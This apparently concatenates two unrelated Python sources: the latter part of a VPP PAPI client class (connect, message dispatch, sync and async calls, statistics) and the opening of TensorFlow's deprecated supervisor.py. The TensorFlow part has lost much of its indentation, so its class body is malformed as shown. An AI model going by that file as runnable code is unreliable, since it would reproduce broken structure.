        self.testmode = testmode
        self.use_socket = use_socket
        self.server_address = server_address
        self._apifiles = apifiles
        self.stats = {}  # per-message call timing statistics, see _add_stat()

        # Pick the transport implementation: unix socket (default) or
        # shared memory.
        if use_socket:
            from . vpp_transport_socket import VppTransport
        else:
            from . vpp_transport_shmem import VppTransport

        if not apifiles:
            # Pick up API definitions from default directory
            try:
                apifiles = VPPApiJSONFiles.find_api_files(self.apidir)
            except (RuntimeError, VPPApiError):
                # In test mode we don't care that we can't find the API files
                if testmode:
                    apifiles = []
                else:
                    raise VPPRuntimeError

        for file in apifiles:
            with open(file) as apidef_file:
                m, s = VPPApiJSONFiles.process_json_file(apidef_file)
                self.messages.update(m)
                self.services.update(s)

        self.apifiles = apifiles

        # Basic sanity check
        if len(self.messages) == 0 and not testmode:
            raise VPPValueError(1, 'Missing JSON message definitions')
        if not(verify_enum_hint(VppEnum.vl_api_address_family_t)):
            raise VPPRuntimeError("Invalid address family hints. "
                                  "Cannot continue.")

        self.transport = VppTransport(self, read_timeout=read_timeout,
                                      server_address=server_address)
        # Make sure we allow VPP to clean up the message rings.
        atexit.register(vpp_atexit, weakref.ref(self))

        add_convenience_methods()

    def get_function(self, name):
        """Return the dynamically created API function called *name*."""
        return getattr(self._api, name)

    class ContextId:
        """Multiprocessing-safe provider of unique context IDs."""
        def __init__(self):
            self.context = mp.Value(ctypes.c_uint, 0)
            self.lock = mp.Lock()

        def __call__(self):
            """Get a new unique (or, at least, not recently used) context."""
            with self.lock:
                self.context.value += 1
                return self.context.value
    # Shared across all client instances (and processes, via mp.Value).
    get_context = ContextId()

    def get_type(self, name):
        """Look up a VPP type by name in the global type registry."""
        return vpp_get_type(name)

    @property
    def api(self):
        # Holder of the dynamically created API methods; populated by
        # _register_functions() after a successful connect.
        if not hasattr(self, "_api"):
            raise VPPApiError("Not connected, api definitions not available")
        return self._api

    def make_function(self, msg, i, multipart, do_async):
        """Build the callable for message *msg* with table index *i*."""
        if (do_async):
            def f(**kwargs):
                return self._call_vpp_async(i, msg, **kwargs)
        else:
            def f(**kwargs):
                return self._call_vpp(i, msg, multipart, **kwargs)

        f.__name__ = str(msg.name)
        # Describe the message fields in the function's docstring.
        f.__doc__ = ", ".join(["%s %s" %
                               (msg.fieldtypes[j], k)
                               for j, k in enumerate(msg.fields)])
        f.msg = msg
        return f

    def _register_functions(self, do_async=False):
        """Create one API method per message known to both client and VPP."""
        self.id_names = [None] * (self.vpp_dictionary_maxid + 1)
        self.id_msgdef = [None] * (self.vpp_dictionary_maxid + 1)
        self._api = VppApiDynamicMethodHolder()
        for name, msg in self.messages.items():
            # Messages are matched against VPP's table by name + CRC.
            n = name + '_' + msg.crc[2:]
            i = self.transport.get_msg_index(n)
            if i > 0:
                self.id_msgdef[i] = msg
                self.id_names[i] = name

                # Create function for client side messages.
                if name in self.services:
                    f = self.make_function(msg, i, self.services[name], do_async)
                    setattr(self._api, name, FuncWrapper(f))
            else:
                self.logger.debug(
                    'No such message type or failed CRC checksum: %s', n)

    def connect_internal(self, name, msg_handler, chroot_prefix, rx_qlen,
                         do_async):
        """Shared implementation of connect()/connect_sync()."""
        pfx = chroot_prefix.encode('utf-8') if chroot_prefix else None

        rv = self.transport.connect(name, pfx,
                                    msg_handler, rx_qlen)
        if rv != 0:
            raise VPPIOError(2, 'Connect failed')
        self.vpp_dictionary_maxid = self.transport.msg_table_max_index()
        self._register_functions(do_async=do_async)

        # Initialise control ping
        crc = self.messages['control_ping'].crc
        self.control_ping_index = self.transport.get_msg_index(
            ('control_ping' + '_' + crc[2:]))
        self.control_ping_msgdef = self.messages['control_ping']
        if self.async_thread:
            self.event_thread = threading.Thread(
                target=self.thread_msg_handler)
            self.event_thread.daemon = True
            self.event_thread.start()
        else:
            self.event_thread = None
        return rv

    def connect(self, name, chroot_prefix=None, do_async=False, rx_qlen=32):
        """Attach to VPP.

        name - the name of the client.
        chroot_prefix - if VPP is chroot'ed, the prefix of the jail
        do_async - if true, messages are sent without waiting for a reply
        rx_qlen - the length of the VPP message receive queue between
        client and server.
        """
        msg_handler = self.transport.get_callback(do_async)
        return self.connect_internal(name, msg_handler, chroot_prefix, rx_qlen,
                                     do_async)

    def connect_sync(self, name, chroot_prefix=None, rx_qlen=32):
        """Attach to VPP in synchronous mode. Application must poll for events.

        name - the name of the client.
        chroot_prefix - if VPP is chroot'ed, the prefix of the jail
        rx_qlen - the length of the VPP message receive queue between
        client and server.
        """
        return self.connect_internal(name, None, chroot_prefix, rx_qlen,
                                     do_async=False)

    def disconnect(self):
        """Detach from VPP."""
        rv = self.transport.disconnect()
        if self.event_thread is not None:
            # Wake the event thread so its loop can exit.
            self.message_queue.put("terminate event thread")
        return rv

    def msg_handler_sync(self, msg):
        """Process an incoming message from VPP in sync mode.

        The message may be a reply or it may be an async notification.
        """
        r = self.decode_incoming_msg(msg)
        if r is None:
            return

        # If we have a context, then use the context to find any
        # request waiting for a reply
        context = 0
        if hasattr(r, 'context') and r.context > 0:
            context = r.context

        if context == 0:
            # No context -> async notification that we feed to the callback
            self.message_queue.put_nowait(r)
        else:
            raise VPPIOError(2, 'RPC reply message received in event handler')

    def has_context(self, msg):
        """Return True if the raw message carries a usable context field.

        Returns None (falsy) for the internal 'rx_thread_exit' message.
        """
        # Too short to hold msgid + client_index + context.
        if len(msg) < 10:
            return False

        header = VPPType('header_with_context', [['u16', 'msgid'],
                                                 ['u32', 'client_index'],
                                                 ['u32', 'context']])

        (i, ci, context), size = header.unpack(msg, 0)
        if self.id_names[i] == 'rx_thread_exit':
            return

        #
        # Decode message and returns a tuple.
        #
        msgobj = self.id_msgdef[i]
        if 'context' in msgobj.field_by_name and context >= 0:
            return True
        return False

    def decode_incoming_msg(self, msg, no_type_conversion=False):
        """Unpack a raw message into a decoded object.

        Returns None for empty reads and the internal 'rx_thread_exit'
        message; raises VPPIOError for messages with no known definition.
        """
        if not msg:
            logger.warning('vpp_api.read failed')
            return

        (i, ci), size = self.header.unpack(msg, 0)
        if self.id_names[i] == 'rx_thread_exit':
            return

        #
        # Decode message and returns a tuple.
        #
        msgobj = self.id_msgdef[i]
        if not msgobj:
            raise VPPIOError(2, 'Reply message undefined')

        r, size = msgobj.unpack(msg, ntc=no_type_conversion)
        return r

    def msg_handler_async(self, msg):
        """Process a message from VPP in async mode.

        In async mode, all messages are returned to the callback.
        """
        r = self.decode_incoming_msg(msg)
        if r is None:
            return

        msgname = type(r).__name__

        if self.event_callback:
            self.event_callback(msgname, r)

    def _control_ping(self, context):
        """Send a ping command."""
        self._call_vpp_async(self.control_ping_index,
                             self.control_ping_msgdef,
                             context=context)

    def validate_args(self, msg, kwargs):
        """Raise VPPValueError if kwargs contains fields unknown to *msg*."""
        d = set(kwargs.keys()) - set(msg.field_by_name.keys())
        if d:
            raise VPPValueError('Invalid argument {} to {}'
                                .format(list(d), msg.name))

    def _add_stat(self, name, ms):
        """Fold one call duration (milliseconds) into the per-message stats."""
        if not name in self.stats:
            self.stats[name] = {'max': ms, 'count': 1, 'avg': ms}
        else:
            if ms > self.stats[name]['max']:
                self.stats[name]['max'] = ms
            self.stats[name]['count'] += 1
            n = self.stats[name]['count']
            # Incremental running average.
            self.stats[name]['avg'] = self.stats[name]['avg'] * (n - 1) / n + ms / n

    def get_stats(self):
        """Return the call statistics formatted as a table, slowest first."""
        s = '\n=== API PAPI STATISTICS ===\n'
        s += '{:<30} {:>4} {:>6} {:>6}\n'.format('message', 'cnt', 'avg', 'max')
        for n in sorted(self.stats.items(), key=lambda v: v[1]['avg'], reverse=True):
            s += '{:<30} {:>4} {:>6.2f} {:>6.2f}\n'.format(n[0], n[1]['count'],
                                                           n[1]['avg'], n[1]['max'])
        return s

    def get_field_options(self, msg, fld_name):
        """Return the options dict of field *fld_name* in message *msg*,
        or None if the field has no options."""
        # when there is an option, the msgdef has 3 elements.
        # ['u32', 'ring_size', {'default': 1024}]
        for _def in self.messages[msg].msgdef:
            if isinstance(_def, list) and \
                    len(_def) == 3 and \
                    _def[1] == fld_name:
                return _def[2]

    def _call_vpp(self, i, msgdef, service, **kwargs):
        """Given a message, send the message and await a reply.

        msgdef - the message packing definition
        i - the message type index
        service - the service description; determines the expected reply
        message and whether this is a (multipart) stream call.
        context - context number - chosen at random if not
        supplied.
        The remainder of the kwargs are the arguments to the API call.

        The return value is the message or message array containing
        the response. It will raise an IOError exception if there was
        no response within the timeout window.
        """
        ts = time.time()
        if 'context' not in kwargs:
            context = self.get_context()
            kwargs['context'] = context
        else:
            context = kwargs['context']
        kwargs['_vl_msg_id'] = i

        no_type_conversion = kwargs.pop('_no_type_conversion', False)
        timeout = kwargs.pop('_timeout', None)

        try:
            if self.transport.socket_index:
                kwargs['client_index'] = self.transport.socket_index
        except AttributeError:
            pass
        self.validate_args(msgdef, kwargs)

        s = 'Calling {}({})'.format(msgdef.name,
                                    ','.join(['{!r}:{!r}'.format(k, v) for k, v in kwargs.items()]))
        self.logger.debug(s)

        b = msgdef.pack(kwargs)
        self.transport.suspend()

        self.transport.write(b)

        msgreply = service['reply']
        stream = True if 'stream' in service else False
        if stream:
            if 'stream_msg' in service:
                # New service['reply'] = _reply and service['stream_message'] = _details
                stream_message = service['stream_msg']
                modern = True
            else:
                # Old service['reply'] = _details
                stream_message = msgreply
                msgreply = 'control_ping_reply'
                modern = False
                # Send a ping after the request - we use its response
                # to detect that we have seen all results.
                self._control_ping(context)

        # Block until we get a reply.
        rl = []
        while (True):
            r = self.read_blocking(no_type_conversion, timeout)
            if r is None:
                raise VPPIOError(2, 'VPP API client: read failed')
            msgname = type(r).__name__
            if context not in r or r.context == 0 or context != r.context:
                # Message being queued
                self.message_queue.put_nowait(r)
                continue
            if msgname != msgreply and (stream and (msgname != stream_message)):
                print('REPLY MISMATCH', msgreply, msgname, stream_message, stream)
            if not stream:
                rl = r
                break
            if msgname == msgreply:
                if modern:  # Return both reply and list
                    rl = r, rl
                break

            rl.append(r)

        self.transport.resume()

        s = 'Return value: {!r}'.format(r)
        if len(s) > 80:
            s = s[:80] + "..."
        self.logger.debug(s)
        te = time.time()
        self._add_stat(msgdef.name, (te - ts) * 1000)
        return rl

    def _call_vpp_async(self, i, msg, **kwargs):
        """Given a message, send the message and return the context.

        msgdef - the message packing definition
        i - the message type index
        context - context number - chosen at random if not
        supplied.
        The remainder of the kwargs are the arguments to the API call.

        The reply message(s) will be delivered later to the registered callback.
        The returned context will help with assigning which call
        the reply belongs to.
        """
        if 'context' not in kwargs:
            context = self.get_context()
            kwargs['context'] = context
        else:
            context = kwargs['context']
        try:
            if self.transport.socket_index:
                kwargs['client_index'] = self.transport.socket_index
        except AttributeError:
            kwargs['client_index'] = 0
        kwargs['_vl_msg_id'] = i
        b = msg.pack(kwargs)

        self.transport.write(b)
        return context

    def read_blocking(self, no_type_conversion=False, timeout=None):
        """Get next received message from transport within timeout, decoded.

        Note that notifications have context zero
        and are not put into receive queue (at least for socket transport),
        use async_thread with registered callback for processing them.

        If no message appears in the queue within timeout, return None.

        Optionally, type conversion can be skipped,
        as some of conversions are into less precise types.

        When r is the return value of this, the caller can get message name as:
        msgname = type(r).__name__
        and context number (type long) as:
        context = r.context

        :param no_type_conversion: If false, type conversions are applied.
        :type no_type_conversion: bool
        :returns: Decoded message, or None if no message (within timeout).
        :rtype: Whatever VPPType.unpack returns, depends on no_type_conversion.
        :raises VppTransportShmemIOError if timed out.
        """
        msg = self.transport.read(timeout=timeout)
        if not msg:
            return None
        return self.decode_incoming_msg(msg, no_type_conversion)

    def register_event_callback(self, callback):
        """Register a callback for async messages.

        This will be called for async notifications in sync mode,
        and all messages in async mode. In sync mode, replies to
        requests will not come here.

        callback is a fn(msg_type_name, msg_type) that will be
        called when a message comes in. While this function is
        executing, note that (a) you are in a background thread and
        may wish to use threading.Lock to protect your datastructures,
        and (b) message processing from VPP will stop (so if you take
        a long while about it you may provoke reply timeouts or cause
        VPP to fill the RX buffer). Passing None will disable the
        callback.
        """
        self.event_callback = callback

    def thread_msg_handler(self):
        """Python thread calling the user registered message handler.

        This is to emulate the old style event callback scheme. Modern
        clients should provide their own thread to poll the event
        queue.
        """
        while True:
            r = self.message_queue.get()
            # Sentinel string pushed by disconnect().
            if r == "terminate event thread":
                break
            msgname = type(r).__name__
            if self.event_callback:
                self.event_callback(msgname, r)

    def validate_message_table(self, namecrctable):
        """Take a dictionary of name_crc message names
        and returns an array of missing messages"""
        missing_table = []
        for name_crc in namecrctable:
            i = self.transport.get_msg_index(name_crc)
            if i <= 0:
                missing_table.append(name_crc)
        return missing_table

    def dump_message_table(self):
        """Return VPPs API message table as name_crc dictionary"""
        return self.transport.message_table

    def dump_message_table_filtered(self, msglist):
        """Return VPPs API message table as name_crc dictionary,
        filtered by message name list."""
        replies = [self.services[n]['reply'] for n in msglist]
        message_table_filtered = {}
        for name in msglist + replies:
            for k, v in self.transport.message_table.items():
                if k.startswith(name):
                    message_table_filtered[k] = v
                    break
        return message_table_filtered

    def __repr__(self):
        return "<VPPApiClient apifiles=%s, testmode=%s, async_thread=%s, " \
            "logger=%s, read_timeout=%s, use_socket=%s, " \
            "server_address='%s'>" % (
                self._apifiles, self.testmode, self.async_thread,
                self.logger, self.read_timeout, self.use_socket,
                self.server_address)

    def details_iter(self, f, **kwargs):
        """Iterate a cursor-paged dump call *f*, yielding each details
        record across pages."""
        cursor = 0
        while True:
            kwargs['cursor'] = cursor
            rv, details = f(**kwargs)
            for d in details:
                yield d
            # Fetch the next page only while retval == -165 (presumably
            # VPP's "more data, retry with new cursor" errno — confirm
            # against VPP's api_errno definitions).
            if rv.retval == 0 or rv.retval != -165:
                break
            cursor = rv.cursor
|
supervisor.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training helper that checkpoints models and computes summaries."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import os
import time
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary as _summary
from tensorflow.python.training import coordinator
from tensorflow.python.training import saver as saver_mod
from tensorflow.python.training import session_manager as session_manager_mod
from tensorflow.python.training import training_util
from tensorflow.python.util import deprecation
from tensorflow.python.util.tf_export import tf_export
@tf_export("train.Supervisor")
class Supervisor(object):
"""A training helper that checkpoints models and computes summaries.
This class is deprecated. Please use
`tf.train.MonitoredTrainingSession` instead.
The Supervisor is a small wrapper around a `Coordinator`, a `Saver`,
and a `SessionManager` that takes care of common needs of TensorFlow
training programs.
#### Use for a single program
```python
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that will checkpoint the model in '/tmp/mydir'.
sv = Supervisor(logdir='/tmp/mydir')
# Get a TensorFlow session managed by the supervisor.
with sv.managed_session(FLAGS.master) as sess:
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
```
Within the `with sv.managed_session()` block all variables in the graph have
been initialized. In addition, a few services have been started to
checkpoint the model and add summaries to the event log.
If the program crashes and is restarted, the managed session automatically
reinitialize variables from the most recent checkpoint.
The supervisor is notified of any exception raised by one of the services.
After an exception is raised, `should_stop()` returns `True`. In that case
the training loop should also stop. This is why the training loop has to
check for `sv.should_stop()`.
Exceptions that indicate that the training inputs have been exhausted,
`tf.errors.OutOfRangeError`, also cause `sv.should_stop()` to return `True`
but are not re-raised from the `with` block: they indicate a normal
termination.
#### Use for multiple replicas
To train with replicas you deploy the same program in a `Cluster`.
One of the tasks must be identified as the *chief*: the task that handles
initialization, checkpoints, summaries, and recovery. The other tasks
depend on the *chief* for these services.
The only change you have to do to the single program code is to indicate
if the program is running as the *chief*.
```python
# Choose a task as the chief. This could be based on server_def.task_index,
# or job_def.name, or job_def.tasks. It's entirely up to the end user.
# But there can be only one *chief*.
is_chief = (server_def.task_index == 0)
server = tf.train.Server(server_def)
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that uses log directory on a shared file system.
# Indicate if you are the 'chief'
sv = Supervisor(logdir='/shared_directory/...', is_chief=is_chief)
# Get a Session in a TensorFlow server on the cluster.
with sv.managed_session(server.target) as sess:
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
```
In the *chief* task, the `Supervisor` works exactly as in the first example
above. In the other tasks `sv.managed_session()` waits for the Model to have
been initialized before returning a session to the training code. The
non-chief tasks depend on the chief task for initializing the model.
If one of the tasks crashes and restarts, `managed_session()`
checks if the Model is initialized. If yes, it just creates a session and
returns it to the training code that proceeds normally. If the model needs
to be initialized, the chief task takes care of reinitializing it; the other
tasks just wait for the model to have been initialized.
NOTE: This modified program still works fine as a single program.
The single program marks itself as the chief.
#### What `master` string to use
Whether you are running on your machine or in the cluster you can use the
following values for the --master flag:
* Specifying `''` requests an in-process session that does not use RPC.
* Specifying `'local'` requests a session that uses the RPC-based
"Master interface" to run TensorFlow programs. See
`tf.train.Server.create_local_server` for
details.
* Specifying `'grpc://hostname:port'` requests a session that uses
the RPC interface to a specific host, and also allows the in-process
master to access remote tensorflow workers. Often, it is
appropriate to pass `server.target` (for some `tf.train.Server`
named `server).
#### Advanced use
##### Launching additional services
`managed_session()` launches the Checkpoint and Summary services (threads).
If you need more services to run you can simply launch them in the block
controlled by `managed_session()`.
Example: Start a thread to print losses. We want this thread to run
every 60 seconds, so we launch it with `sv.loop()`.
```python
...
sv = Supervisor(logdir='/tmp/mydir')
with sv.managed_session(FLAGS.master) as sess:
sv.loop(60, print_loss, (sess, ))
while not sv.should_stop():
sess.run(my_train_op)
```
##### Launching fewer services
`managed_session()` launches the "summary" and "checkpoint" threads which use
either the optionally `summary_op` and `saver` passed to the constructor, or
default ones created automatically by the supervisor. If you want to run
your own summary and checkpointing logic, disable these services by passing
`None` to the `summary_op` and `saver` parameters.
Example: Create summaries manually every 100 steps in the chief.
```python
# Create a Supervisor with no automatic summaries.
sv = Supervisor(logdir='/tmp/mydir', is_chief=is_chief, summary_op=None)
# As summary_op was None, managed_session() does not start the
# summary thread.
with sv.managed_session(FLAGS.master) as sess:
for step in xrange(1000000):
if sv.should_stop():
break
if is_chief and step % 100 == 0:
# Create the summary every 100 chief steps.
sv.summary_computed(sess, sess.run(my_summary_op))
else:
# Train normally
sess.run(my_train_op)
```
##### Custom model initialization
`managed_session()` only supports initializing the model by running an
`init_op` or restoring from the latest checkpoint. If you have special
initialization needs, see how to specify a `local_init_op` when creating the
supervisor. You can also use the `SessionManager` directly to create a
session and check if it could be initialized automatically.
"""
# Value to pass for the 'ready_op', 'init_op', 'summary_op', 'saver',
# and 'global_step' parameters of Supervisor.__init__() to indicate that
# the default behavior should be used.
USE_DEFAULT = 0
@deprecation.deprecated(None,
                        "Please switch to tf.train.MonitoredTrainingSession")
def __init__(self,
             graph=None,
             ready_op=USE_DEFAULT,
             ready_for_local_init_op=USE_DEFAULT,
             is_chief=True,
             init_op=USE_DEFAULT,
             init_feed_dict=None,
             local_init_op=USE_DEFAULT,
             logdir=None,
             summary_op=USE_DEFAULT,
             saver=USE_DEFAULT,
             global_step=USE_DEFAULT,
             save_summaries_secs=120,
             save_model_secs=600,
             recovery_wait_secs=30,
             stop_grace_secs=120,
             checkpoint_basename="model.ckpt",
             session_manager=None,
             summary_writer=USE_DEFAULT,
             init_fn=None,
             local_init_run_options=None):
  """Create a `Supervisor`.

  Args:
    graph: A `Graph`. The graph that the model will use. Defaults to the
      default `Graph`. The supervisor may add operations to the graph before
      creating a session, but the graph should not be modified by the caller
      after passing it to the supervisor.
    ready_op: 1-D string `Tensor`. This tensor is evaluated by supervisors in
      `prepare_or_wait_for_session()` to check if the model is ready to use.
      The model is considered ready if it returns an empty array. Defaults to
      the tensor returned from `tf.report_uninitialized_variables()`. If
      `None`, the model is not checked for readiness.
    ready_for_local_init_op: 1-D string `Tensor`. This tensor is evaluated by
      supervisors in `prepare_or_wait_for_session()` to check if the model is
      ready to run the local_init_op.
      The model is considered ready if it returns an empty array. Defaults to
      `None`. If `None`, the model is not checked for readiness before running
      local_init_op.
    is_chief: If True, create a chief supervisor in charge of initializing
      and restoring the model. If False, create a supervisor that relies
      on a chief supervisor for inits and restore.
    init_op: `Operation`. Used by chief supervisors to initialize the model
      when it can not be recovered. Defaults to an `Operation` that
      initializes all global variables. If `None`, no initialization is done
      automatically unless you pass a value for `init_fn`, see below.
    init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
      This feed dictionary will be used when `init_op` is evaluated.
    local_init_op: `Operation`. Used by all supervisors to run initializations
      that should run for every new supervisor instance. By default these
      are table initializers and initializers for local variables.
      If `None`, no further per supervisor-instance initialization is
      done automatically.
    logdir: A string. Optional path to a directory where to checkpoint the
      model and log events for the visualizer. Used by chief supervisors.
      The directory will be created if it does not exist.
    summary_op: An `Operation` that returns a Summary for the event logs.
      Used by chief supervisors if a `logdir` was specified. Defaults to the
      operation returned from summary.merge_all(). If `None`, summaries are
      not computed automatically.
    saver: A Saver object. Used by chief supervisors if a `logdir` was
      specified. Defaults to the saver returned by Saver().
      If `None`, the model is not saved automatically.
    global_step: An integer Tensor of size 1 that counts steps. The value
      from 'global_step' is used in summaries and checkpoint filenames.
      Default to the op named 'global_step' in the graph if it exists, is of
      rank 1, size 1, and of type tf.int32 or tf.int64. If `None` the global
      step is not recorded in summaries and checkpoint files. Used by chief
      supervisors if a `logdir` was specified.
    save_summaries_secs: Number of seconds between the computation of
      summaries for the event log. Defaults to 120 seconds. Pass 0 to
      disable summaries.
    save_model_secs: Number of seconds between the creation of model
      checkpoints. Defaults to 600 seconds. Pass 0 to disable checkpoints.
    recovery_wait_secs: Number of seconds between checks that the model
      is ready. Used by supervisors when waiting for a chief supervisor
      to initialize or restore the model. Defaults to 30 seconds.
    stop_grace_secs: Grace period, in seconds, given to running threads to
      stop when `stop()` is called. Defaults to 120 seconds.
    checkpoint_basename: The basename for checkpoint saving.
    session_manager: `SessionManager`, which manages Session creation and
      recovery. If it is `None`, a default `SessionManager` will be created
      with the set of arguments passed in for backwards compatibility.
    summary_writer: `SummaryWriter` to use or `USE_DEFAULT`. Can be `None`
      to indicate that no summaries should be written.
    init_fn: Optional callable used to initialize the model. Called
      after the optional `init_op` is called. The callable must accept one
      argument, the session being initialized.
    local_init_run_options: RunOptions to be passed as the SessionManager
      local_init_run_options parameter.

  Returns:
    A `Supervisor`.

  Raises:
    RuntimeError: If called with eager execution enabled.

  @compatibility(eager)
  `Supervisor`s are not supported when eager execution is enabled.
  @end_compatibility
  """
  if context.executing_eagerly():
    # Bug fix: the message previously read "Supervisors are compatible with
    # eager execution", which is the opposite of what this error means.
    raise RuntimeError("Supervisors are incompatible with eager execution.")
  # Set default values of arguments.
  if graph is None:
    graph = ops.get_default_graph()
  with graph.as_default():
    self._init_ready_op(
        ready_op=ready_op, ready_for_local_init_op=ready_for_local_init_op)
    self._init_init_op(init_op=init_op, init_feed_dict=init_feed_dict)
    self._init_local_init_op(local_init_op=local_init_op)
    self._init_saver(saver=saver)
    self._init_summary_op(summary_op=summary_op)
    self._init_global_step(global_step=global_step)
  self._graph = graph
  self._meta_graph_def = meta_graph.create_meta_graph_def(
      graph_def=graph.as_graph_def(add_shapes=True),
      saver_def=self._saver.saver_def if self._saver else None)
  self._is_chief = is_chief
  self._coord = coordinator.Coordinator()
  self._recovery_wait_secs = recovery_wait_secs
  self._stop_grace_secs = stop_grace_secs
  self._init_fn = init_fn
  self._local_init_run_options = local_init_run_options

  # Set all attributes related to checkpointing and writing events to None.
  # Afterwards, set them appropriately for chief supervisors, as these are
  # the only supervisors that can write checkpoints and events.
  self._logdir = None
  self._save_summaries_secs = None
  self._save_model_secs = None
  self._save_path = None
  self._summary_writer = None

  if self._is_chief:
    self._logdir = logdir
    self._save_summaries_secs = save_summaries_secs
    self._save_model_secs = save_model_secs
    if self._logdir:
      self._save_path = os.path.join(self._logdir, checkpoint_basename)
    if summary_writer is Supervisor.USE_DEFAULT:
      if self._logdir:
        self._summary_writer = _summary.FileWriter(self._logdir)
    else:
      self._summary_writer = summary_writer
    self._graph_added_to_summary = False

  self._init_session_manager(session_manager=session_manager)
  self._verify_setup()
  # The graph is not allowed to change anymore.
  graph.finalize()
def _init_session_manager(self, session_manager=None):
  """Set the SessionManager, building a default one when none is supplied."""
  if session_manager is not None:
    self._session_manager = session_manager
    return
  # Build a default manager from the supervisor's own ops/settings for
  # backwards compatibility.
  self._session_manager = session_manager_mod.SessionManager(
      local_init_op=self._local_init_op,
      ready_op=self._ready_op,
      ready_for_local_init_op=self._ready_for_local_init_op,
      graph=self._graph,
      recovery_wait_secs=self._recovery_wait_secs,
      local_init_run_options=self._local_init_run_options)
def _get_first_op_from_collection(self, key):
  """Return the first `Operation` stored under a graph collection key.

  Args:
    key: A string collection key.

  Returns:
    The first op in the collection, or `None` if the collection is empty
    or the key cannot be looked up.
  """
  try:
    found = ops.get_collection(key)
  except LookupError:
    return None
  if not found:
    return None
  if len(found) > 1:
    logging.info("Found %d %s operations. Returning the first one.",
                 len(found), key)
  return found[0]
def _init_ready_op(self,
                   ready_op=USE_DEFAULT,
                   ready_for_local_init_op=USE_DEFAULT):
  """Initializes ready_op.

  Args:
    ready_op: `Tensor` to check if the model is initialized.
      If it's set to USE_DEFAULT, creates an op that checks all
      the variables are initialized.
    ready_for_local_init_op: `Tensor` to check if the model is ready to run
      local_init_op.
      If it's set to USE_DEFAULT, creates an op that checks all
      the global variables are initialized.
  """
  if ready_op is Supervisor.USE_DEFAULT:
    # Reuse a collected op when available; otherwise create one and
    # register it so later supervisors pick up the same op.
    collected = self._get_first_op_from_collection(ops.GraphKeys.READY_OP)
    if collected is None:
      collected = variables.report_uninitialized_variables()
      ops.add_to_collection(ops.GraphKeys.READY_OP, collected)
    ready_op = collected
  self._ready_op = ready_op

  # ready_for_local_init_op defaults to None for backward compatibility.
  if ready_for_local_init_op is Supervisor.USE_DEFAULT:
    ready_for_local_init_op = self._get_first_op_from_collection(
        ops.GraphKeys.READY_FOR_LOCAL_INIT_OP)
  self._ready_for_local_init_op = ready_for_local_init_op
def _init_init_op(self, init_op=USE_DEFAULT, init_feed_dict=None):
  """Initializes init_op.

  Args:
    init_op: `Operation` to initialize the variables. If set to USE_DEFAULT,
      create an op that initializes all variables and tables.
    init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
      This feed dictionary will be used when `init_op` is evaluated.
  """
  if init_op is Supervisor.USE_DEFAULT:
    # Prefer an op already registered in the graph; otherwise create the
    # default initializer and register it for other supervisors to share.
    collected = self._get_first_op_from_collection(ops.GraphKeys.INIT_OP)
    if collected is None:
      collected = variables.global_variables_initializer()
      ops.add_to_collection(ops.GraphKeys.INIT_OP, collected)
    init_op = collected
  self._init_op = init_op
  self._init_feed_dict = init_feed_dict
def _init_local_init_op(self, local_init_op=USE_DEFAULT):
  """Initializes local_init_op.

  Args:
    local_init_op: `Operation` run for every new supervisor instance. If set
      to USE_DEFAULT, use the first op from the GraphKeys.LOCAL_INIT_OP
      collection. If the collection is empty, create an op that initializes
      all local variables and all tables.
  """
  if local_init_op is Supervisor.USE_DEFAULT:
    local_init_op = self._get_first_op_from_collection(
        ops.GraphKeys.LOCAL_INIT_OP)
    if local_init_op is None:
      # Group local-variable and table initializers into a single op.
      # (The previous `if op_list:` guard was dead code: the list literal
      # always held two elements and was therefore always truthy.)
      local_init_op = control_flow_ops.group(
          variables.local_variables_initializer(),
          lookup_ops.tables_initializer())
      ops.add_to_collection(ops.GraphKeys.LOCAL_INIT_OP, local_init_op)
  self._local_init_op = local_init_op
def _init_saver(self, saver=USE_DEFAULT):
  """Initializes saver.

  Args:
    saver: A `Saver` object. If set to USE_DEFAULT, create one that
      saves all the variables.
  """
  if saver is Supervisor.USE_DEFAULT:
    saver = self._get_first_op_from_collection(ops.GraphKeys.SAVERS)
    # Only build a default Saver when there are global variables to save.
    if saver is None and variables.global_variables():
      saver = saver_mod.Saver()
      ops.add_to_collection(ops.GraphKeys.SAVERS, saver)
  self._saver = saver
def _init_summary_op(self, summary_op=USE_DEFAULT):
  """Initializes summary_op.

  Args:
    summary_op: An Operation that returns a Summary for the event logs.
      If set to USE_DEFAULT, create an op that merges all the summaries.
  """
  if summary_op is Supervisor.USE_DEFAULT:
    summary_op = self._get_first_op_from_collection(ops.GraphKeys.SUMMARY_OP)
    if summary_op is None:
      # merge_all() returns None when the graph defines no summaries.
      summary_op = _summary.merge_all()
      if summary_op is not None:
        ops.add_to_collection(ops.GraphKeys.SUMMARY_OP, summary_op)
  self._summary_op = summary_op
def _init_global_step(self, global_step=USE_DEFAULT):
  """Initializes global_step.

  Args:
    global_step: An integer Tensor of size 1 that counts steps. If
      set to USE_DEFAULT, creates global_step tensor.
  """
  if global_step is Supervisor.USE_DEFAULT:
    global_step = self._get_first_op_from_collection(
        ops.GraphKeys.GLOBAL_STEP)
    if global_step is None:
      # Fall back to the tensor named "global_step:0" if one exists.
      global_step = self._default_global_step_tensor()
      if global_step is not None:
        ops.add_to_collection(ops.GraphKeys.GLOBAL_STEP, global_step)
  self._global_step = global_step
@property
def is_chief(self):
  """Return True if this is a chief supervisor.

  Returns:
    A bool.
